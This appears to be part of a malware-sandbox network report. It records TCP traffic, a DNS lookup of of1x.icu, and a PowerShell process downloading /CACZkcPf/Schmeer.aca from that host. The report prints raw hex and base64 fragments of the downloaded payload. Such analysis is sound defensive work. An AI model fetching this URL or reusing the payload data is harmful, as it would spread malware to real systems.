                                                                                                                              Dec 23, 2024 06:41:44.849150896 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.849257946 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.856535912 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.856637001 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.863923073 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.863981009 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.867930889 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.868001938 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.875133038 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.875212908 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.882343054 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.882405043 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.889688969 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.889749050 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.893467903 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.893524885 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.901335955 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.901410103 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.908157110 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.908256054 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.911967993 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.912040949 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:44.996495962 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:44.996570110 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.002696991 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.002773046 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.005745888 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.005830050 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.011534929 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.011605978 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.017121077 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.017196894 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.022692919 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.022758961 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.025101900 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.025176048 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.029700041 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.029771090 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.032378912 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.032450914 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.037405968 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.037482023 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.045066118 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.045147896 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.045540094 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.045627117 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.049787998 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.049864054 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.062047958 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062072039 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062108994 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062133074 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.062143087 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.062154055 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.062177896 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.078120947 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.078169107 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.078233004 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.078233004 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.078242064 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.078284979 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.095261097 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.095305920 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.095345974 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.095351934 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.095370054 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.095412016 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.112457991 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.112500906 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.112533092 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.112538099 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.112566948 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.112574100 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.185950994 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.185997963 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.186145067 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.186153889 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.186202049 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.196233988 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.196284056 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.197387934 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.197387934 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.197396994 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.197458982 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.203126907 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.203193903 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.203200102 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.203246117 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.213164091 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.213212013 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.213254929 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.213262081 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.213287115 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.213303089 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.224248886 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.224292040 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.224335909 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.224347115 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.224370003 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.224390030 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.234707117 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.234762907 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.234790087 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.234797001 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.234822989 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.234853029 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.243814945 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.243880987 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.243911982 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.243917942 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.243942022 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.243974924 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.249777079 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.249861956 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.249878883 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.249943972 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.255152941 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.255196095 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.255234957 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.255242109 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.255254030 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.255280972 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.380800009 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.380848885 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.380877972 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.380887985 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.380914927 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.380933046 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.386002064 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.386046886 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.386090994 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.386096954 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.386113882 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.386151075 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.391819000 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.391861916 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.392020941 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.392029047 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.392072916 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.397881031 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.397924900 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.397978067 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.397984982 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.398050070 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.401968956 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.402025938 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.402059078 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.402064085 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.402096033 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.402123928 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.402182102 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.402236938 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.402241945 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.402280092 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.402348042 CET44349737104.21.86.72192.168.2.4
                                                                                                                              Dec 23, 2024 06:41:45.402405024 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.403764009 CET49737443192.168.2.4104.21.86.72
                                                                                                                              Dec 23, 2024 06:41:45.403781891 CET44349737104.21.86.72192.168.2.4

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 23, 2024 06:41:04.161019087 CET5627653192.168.2.41.1.1.1
                                                                                                                              Dec 23, 2024 06:41:04.558152914 CET53562761.1.1.1192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 23, 2024 06:41:04.161019087 CET192.168.2.41.1.1.10xd01eStandard query (0)of1x.icuA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 23, 2024 06:41:04.558152914 CET1.1.1.1192.168.2.40xd01eNo error (0)of1x.icu104.21.86.72A (IP address)IN (0x0001)false
                                                                                                                              Dec 23, 2024 06:41:04.558152914 CET1.1.1.1192.168.2.40xd01eNo error (0)of1x.icu172.67.216.143A (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • of1x.icu

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.449730104.21.86.724432504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-23 05:41:05 UTC172OUTGET /CACZkcPf/Schmeer.aca HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Host: of1x.icu
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-23 05:41:06 UTC787INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 23 Dec 2024 05:41:06 GMT
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BT1hPSYjSi83uywDD79F6fX1K488ZhF7K3mhF8AeuXyJHeHmMHVVjVLi1SjqcNmKfGflMz8%2FHq81Vnkvf9OmoqhrgD%2B9bgPfUE%2BIOk3OEA1qU%2BIQz%2BrfPLojsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f6605492c894356-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1594&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=786&delivery_rate=1796923&cwnd=237&unsent_bytes=0&cid=d99b8e9e71460e25&ts=644&x=0"
                                                                                                                              2024-12-23 05:41:06 UTC582INData Raw: 33 31 65 61 0d 0a 63 51 47 62 63 51 47 62 75 77 47 42 46 67 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 36 77 4b 59 43 2b 73 43 6c 67 69 35 67 46 6a 64 79 2b 73 43 31 70 33 72 41 76 57 6f 67 65 6b 2f 64 31 51 6c 63 51 47 62 36 77 4b 55 4f 49 48 42 76 78 35 33 57 58 45 42 6d 33 45 42 6d 33 45 42 6d 2b 73 43 72 31 4b 36 6c 54 6b 6e 57 75 73 43 57 49 72 72 41 72 63 42 36 77 4a 67 64 75 73 43 73 61 73 78 79 75 73 43 70 55 39 78 41 5a 75 4a 46 41 76 72 41 6a 5a 6a 63 51 47 62 30 65 4c 72 41 6b 73 6e 63 51 47 62 67 38 45 45 36 77 49 6e 77 6e 45 42 6d 34 48 35 76 34 46 5a 41 6e 7a 4b 36 77 4a 57 55 48 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 71 5a 43 69 63 4e 78 41 5a 74 78 41 5a 75 42 77 7a 61 6a 51 67 48 72 41 68 78 54 36 77 4c 54 55 37 72 4d 67 66 72 68 63
                                                                                                                              Data Ascii: 31eacQGbcQGbuwGBFgBxAZtxAZsDXCQE6wKYC+sClgi5gFjdy+sC1p3rAvWogek/d1QlcQGb6wKUOIHBvx53WXEBm3EBm3EBm+sCr1K6lTknWusCWIrrArcB6wJgdusCsasxyusCpU9xAZuJFAvrAjZjcQGb0eLrAksncQGbg8EE6wInwnEBm4H5v4FZAnzK6wJWUHEBm4tEJARxAZvrAqZCicNxAZtxAZuBwzajQgHrAhxT6wLTU7rMgfrhc
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 42 41 45 41 41 48 45 42 6d 33 45 42 6d 31 50 72 41 70 37 55 63 51 47 62 61 76 39 78 41 5a 74 78 41 5a 75 44 77 67 58 72 41 76 4d 4f 63 51 47 62 4d 66 62 72 41 70 4d 54 63 51 47 62 4d 63 6e 72 41 69 59 47 63 51 47 62 69 78 70 78 41 5a 76 72 41 6c 66 42 51 58 45 42 6d 33 45 42 6d 7a 6b 63 43 6e 58 30 36 77 4a 6d 41 75 73 43 53 45 4a 47 36 77 4c 76 36 4f 73 43 66 4f 6d 41 66 41 72 37 75 48 58 63 63 51 47 62 63 51 47 62 69 30 51 4b 2f 48 45 42 6d 2b 73 43 4c 42 63 70 38 4f 73 43 48 56 39 78 41 5a 76 2f 30 6e 45 42 6d 2b 73 43 46 67 65 36 63 4a 51 45 41 48 45 42 6d 2b 73 43 47 6b 73 78 77 4f 73 43 5a 78 58 72 41 69 2f 75 69 33 77 6b 44 48 45 42 6d 2b 73 43 79 30 36 42 4e 41 66 56 47 75 64 4f 36 77 49 5a 4c 2b 73 43 33 37 4f 44 77 41 54 72 41 74 66 31 36 77 4c
                                                                                                                              Data Ascii: BAEAAHEBm3EBm1PrAp7UcQGbav9xAZtxAZuDwgXrAvMOcQGbMfbrApMTcQGbMcnrAiYGcQGbixpxAZvrAlfBQXEBm3EBmzkcCnX06wJmAusCSEJG6wLv6OsCfOmAfAr7uHXccQGbcQGbi0QK/HEBm+sCLBcp8OsCHV9xAZv/0nEBm+sCFge6cJQEAHEBm+sCGksxwOsCZxXrAi/ui3wkDHEBm+sCy06BNAfVGudO6wIZL+sC37ODwATrAtf16wL
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 6f 51 67 71 4a 73 4d 77 67 70 49 32 4d 38 6d 67 71 64 55 41 45 74 37 78 7a 51 54 2f 74 50 74 32 35 56 59 6c 64 66 33 56 67 33 2f 36 63 59 2b 55 78 79 77 74 31 47 31 45 46 30 35 71 35 6c 51 64 46 69 2b 70 70 75 61 50 69 63 63 35 30 37 61 6c 65 33 4f 30 52 71 2b 64 78 5a 42 62 73 74 4e 47 75 64 4f 76 61 35 68 4a 58 78 4c 58 76 67 59 6f 35 2f 50 4a 41 43 59 6b 6d 32 62 46 69 57 77 42 2f 33 50 46 43 50 4f 79 66 42 4e 65 38 63 79 45 2b 6a 54 73 35 38 65 50 64 37 43 57 48 70 7a 75 4b 2f 63 63 54 56 49 74 33 7a 72 70 4e 78 4c 6b 54 66 32 6e 47 33 6e 4b 4f 7a 51 75 4d 73 64 51 32 5a 36 38 64 43 53 52 46 5a 4c 58 6c 46 50 36 55 4c 50 46 4c 53 6e 63 74 75 62 46 74 54 4e 58 36 7a 50 46 4e 45 76 63 5a 57 62 4a 70 43 67 54 79 63 63 53 5a 4d 46 52 39 2b 48 67 63 73 62
                                                                                                                              Data Ascii: oQgqJsMwgpI2M8mgqdUAEt7xzQT/tPt25VYldf3Vg3/6cY+Uxywt1G1EF05q5lQdFi+ppuaPicc507ale3O0Rq+dxZBbstNGudOva5hJXxLXvgYo5/PJACYkm2bFiWwB/3PFCPOyfBNe8cyE+jTs58ePd7CWHpzuK/ccTVIt3zrpNxLkTf2nG3nKOzQuMsdQ2Z68dCSRFZLXlFP6ULPFLSnctubFtTNX6zPFNEvcZWbJpCgTyccSZMFR9+Hgcsb
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 43 4a 41 5a 30 67 6d 78 61 41 6c 2b 32 4d 48 6d 31 6c 72 30 6c 35 4c 39 77 52 6a 4d 48 4b 48 30 30 50 78 48 73 6d 5a 61 38 61 68 49 5a 75 72 39 51 62 65 73 6f 50 5a 66 33 77 51 70 6a 46 72 57 69 56 46 4e 78 51 36 67 78 69 46 32 4f 36 77 48 43 48 37 4a 31 57 5a 52 75 35 6a 50 6c 6d 74 4d 68 66 49 78 4b 4d 49 7a 34 57 56 4e 73 5a 4d 38 50 6a 5a 71 65 42 4f 43 37 6d 68 4b 4f 42 69 6e 30 39 5a 72 2f 69 50 4d 50 50 56 50 4d 39 55 4e 6a 67 5a 72 2b 4b 46 35 6a 69 58 41 76 6f 51 69 74 4d 4c 69 58 48 50 33 31 52 45 4e 44 53 64 58 74 58 61 53 65 6f 4c 33 64 6a 32 68 64 70 4c 73 78 44 74 73 56 59 74 75 5a 4f 31 66 4c 6f 4c 74 45 61 62 73 76 39 47 2b 64 4f 32 68 76 57 2f 4e 55 61 35 30 37 56 47 75 64 4f 31 52 72 6e 54 74 55 61 51 2f 41 4a 70 50 70 70 78 4d 48 6c 35
                                                                                                                              Data Ascii: CJAZ0gmxaAl+2MHm1lr0l5L9wRjMHKH00PxHsmZa8ahIZur9QbesoPZf3wQpjFrWiVFNxQ6gxiF2O6wHCH7J1WZRu5jPlmtMhfIxKMIz4WVNsZM8PjZqeBOC7mhKOBin09Zr/iPMPPVPM9UNjgZr+KF5jiXAvoQitMLiXHP31RENDSdXtXaSeoL3dj2hdpLsxDtsVYtuZO1fLoLtEabsv9G+dO2hvW/NUa507VGudO1RrnTtUaQ/AJpPppxMHl5
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 2f 65 78 55 30 62 31 54 7a 76 43 2f 52 5a 62 54 53 58 50 6e 6d 52 55 68 38 59 72 53 71 45 53 43 6b 4c 34 6d 36 57 51 72 76 7a 69 76 79 6a 6a 56 31 4f 53 6c 6a 79 38 42 6a 48 63 6f 57 51 52 47 4b 64 6b 4e 73 2b 36 6b 62 35 30 36 46 6f 70 56 77 63 43 37 69 45 44 66 67 51 6e 75 59 65 51 75 65 34 4f 45 73 41 74 2b 54 33 77 4d 51 4b 72 45 43 37 55 4f 72 4d 79 78 6d 67 71 68 52 51 6f 7a 38 56 6f 54 6e 46 43 71 34 37 50 33 44 30 46 6e 33 48 69 4b 2f 4a 68 64 33 4c 61 34 5a 56 6c 4a 6c 74 53 4f 6c 65 71 63 69 4e 34 45 62 32 37 37 35 33 7a 31 6e 78 31 69 44 35 6b 37 56 6f 79 44 5a 6a 35 34 72 44 6e 37 69 32 46 65 51 56 33 6c 71 4f 5a 52 50 50 61 54 67 32 4c 5a 33 45 30 68 4a 6c 2f 6b 31 4c 56 59 37 30 67 39 54 4e 72 7a 70 33 6a 69 5a 78 6a 2f 58 6e 55 58 7a 2f 61
                                                                                                                              Data Ascii: /exU0b1TzvC/RZbTSXPnmRUh8YrSqESCkL4m6WQrvzivyjjV1OSljy8BjHcoWQRGKdkNs+6kb506FopVwcC7iEDfgQnuYeQue4OEsAt+T3wMQKrEC7UOrMyxmgqhRQoz8VoTnFCq47P3D0Fn3HiK/Jhd3La4ZVlJltSOleqciN4Eb27753z1nx1iD5k7VoyDZj54rDn7i2FeQV3lqOZRPPaTg2LZ3E0hJl/k1LVY70g9TNrzp3jiZxj/XnUXz/a
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 32 4b 47 2f 58 54 69 69 5a 75 36 6f 62 70 55 78 35 5a 79 38 7a 33 61 6f 4c 6e 5a 57 6c 30 72 6d 65 4f 31 58 6f 4c 54 31 39 36 6e 30 54 56 54 78 37 39 6f 4b 4b 32 61 6c 75 63 4e 6e 62 6c 54 5a 74 66 57 5a 56 62 58 53 58 50 6a 6d 56 45 68 38 33 70 61 6c 44 56 35 36 63 4e 7a 74 49 62 4b 79 66 74 68 34 49 72 69 35 57 6d 4e 70 71 51 4f 78 4f 44 76 59 38 69 76 72 30 5a 75 61 4f 6c 32 77 35 30 37 61 6c 58 44 79 31 52 71 39 79 67 31 42 30 67 6f 4e 63 34 77 66 62 4e 71 57 76 68 4b 62 4a 67 38 78 70 36 72 50 46 4d 33 6e 48 44 2b 54 2f 69 55 66 6f 58 46 6b 75 38 6a 34 48 78 54 6e 4c 55 34 5a 45 77 7a 46 2b 67 7a 57 6d 51 6c 44 34 6d 6a 75 51 75 42 37 2b 2f 54 66 69 64 6f 62 73 6b 37 56 47 75 64 4f 31 52 72 6e 54 74 55 61 35 30 37 56 47 6c 6c 57 31 72 4c 63 4b 7a 57
                                                                                                                              Data Ascii: 2KG/XTiiZu6obpUx5Zy8z3aoLnZWl0rmeO1XoLT196n0TVTx79oKK2alucNnblTZtfWZVbXSXPjmVEh83palDV56cNztIbKyfth4Iri5WmNpqQOxODvY8ivr0ZuaOl2w507alXDy1Rq9yg1B0goNc4wfbNqWvhKbJg8xp6rPFM3nHD+T/iUfoXFku8j4HxTnLU4ZEwzF+gzWmQlD4mjuQuB7+/Tfidobsk7VGudO1RrnTtUa507VGllW1rLcKzW
                                                                                                                              2024-12-23 05:41:06 UTC1369INData Raw: 71 56 63 70 47 53 50 32 74 54 6d 74 39 7a 37 31 59 74 71 49 36 34 6a 50 78 58 73 79 62 30 64 62 68 51 2f 6b 7a 71 62 46 4f 33 79 30 2f 6e 50 4a 73 53 34 4c 6d 2b 62 46 4a 42 4f 69 74 72 50 46 6b 6b 69 56 56 78 49 65 38 63 33 45 2f 33 54 73 79 4d 55 4e 39 72 57 50 30 59 47 48 46 6d 58 4e 41 58 76 42 67 52 63 6d 6b 6f 4f 76 62 56 72 34 72 6f 58 4e 74 75 49 61 4c 39 44 31 50 71 6a 2b 46 61 63 70 56 72 2f 49 78 2b 72 44 30 39 2f 4c 72 61 41 69 35 34 30 78 69 68 51 32 37 30 6f 37 4d 71 38 48 6d 30 50 59 76 61 36 4c 7a 69 30 50 69 6e 53 37 78 6e 78 5a 58 75 2b 71 46 2b 51 67 34 5a 75 71 4e 51 63 65 6e 63 47 62 2f 65 50 68 66 34 36 54 51 6d 4d 4d 66 6a 52 32 59 7a 76 30 30 61 31 2f 7a 37 77 72 38 61 39 55 45 51 39 74 31 75 75 34 39 58 6b 79 69 6a 73 32 37 6e 4b
